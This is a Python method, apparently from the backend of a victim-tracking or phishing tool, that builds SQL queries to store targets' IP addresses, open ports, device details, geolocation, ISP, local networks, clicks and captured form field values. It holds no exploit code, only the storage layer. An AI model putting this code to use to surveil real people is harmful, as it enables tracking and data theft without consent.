"    def prop_sentences_victim(self, type, data = None):
        if type == 'count_victim':
        	t = (data,)
        	return ("SELECT COUNT(*) AS C FROM victims WHERE id = ?" , t)
        elif type == 'count_times':
        	t = (data,)
        	return ("SELECT COUNT(*) AS C FROM clicks WHERE id = ?" , t)
        elif type == 'update_victim':
        	t = (data[0].ip, data[0].date, data[0].version, data[0].browser, data[0].device, data[0].ports, data[2], data[0].cpu, 'online', data[1],)
        	return ("UPDATE victims SET ip = ?, date = ?, bVersion = ?, browser = ?, device = ?, ports = ?, time = ?, cpu = ?, status = ? WHERE id = ?", t)
        elif type == 'update_victim_geo':
        	t = (data[0].city, data[0].country_code, data[0].country_name, data[0].ip, data[0].latitude, data[0].longitude, data[0].metro_code, data[0].region_code, data[0].region_name, data[0].time_zone, data[0].zip_code, data[0].isp, data[0].ua, data[1],)
        	return ("UPDATE geo SET city = ?, country_code = ?, country_name = ?, ip = ?, latitude = ?, longitude = ?, metro_code = ?, region_code = ?, region_name = ?, time_zone = ?, zip_code = ?, isp = ?, ua=? WHERE id = ?", t)
        elif type == 'insert_victim':
        	t = (data[1], data[0].ip, data[0].date, data[0].version, data[0].browser, data[0].device, data[0].ports, data[2], data[0].cpu, 'online',)
        	return ("INSERT INTO victims(id, ip, date, bVersion, browser, device, ports, time, cpu, status) VALUES(?,?, ?,?, ?,?, ?, ?, ?, ?)", t)
        elif type == 'insert_victim_geo':
        	t = (data[1], data[0].city, data[0].country_code, data[0].country_name, data[0].ip, data[0].latitude, data[0].longitude, data[0].metro_code, data[0].region_code, data[0].region_name, data[0].time_zone, data[0].zip_code, data[0].isp, data[0].ua,)
        	return ("INSERT INTO geo(id, city, country_code, country_name, ip, latitude, longitude, metro_code, region_code, region_name, time_zone, zip_code, isp, ua) VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)" , t)
        elif type == 'count_victim_network':
        	return ("SELECT COUNT(*) AS C FROM networks WHERE id = ? AND network = ?", (data[0], data[1],))
        elif type == 'delete_networks':
        	return ("DELETE FROM networks WHERE id = ?", (data[0],))
        elif type == 'update_network':
        	return ("UPDATE networks SET date = ? WHERE id = ? AND network = ?" , (data[2], data[0], data[1],))
        elif type == 'insert_networks':
        	t = (data[0], data[1], data[2], data[3], data[4],)
        	return ("INSERT INTO networks(id, public_ip, ip, network, date) VALUES(?,?, ?, ?,?)" , t)
        elif type == 'insert_requests':
        	t = (data[0].sId, data[0].id, data[0].site, data[0].fid, data[0].name, data[0].value, data[1],)
        	return ("INSERT INTO requests(id, user_id, site, fid, name, value, date) VALUES(?, ?,?, ?, ?,?, ?)" , t)
        elif type == 'insert_click':
        	return ("INSERT INTO clicks(id, site, date) VALUES(?, ?,?)", (data[0], data[1], data[2],))
        elif type == 'report_online':
        	return ("UPDATE victims SET status = ? WHERE id = ?" , ('online', data[0],))
        elif type == 'clean_online':
        	return ("UPDATE victims SET status = ? ", ('offline',))
        elif type == 'disconnect_victim':
        	return ("UPDATE victims SET status = ? WHERE id = ?" , ('offline', data,))
        else:
        	return False"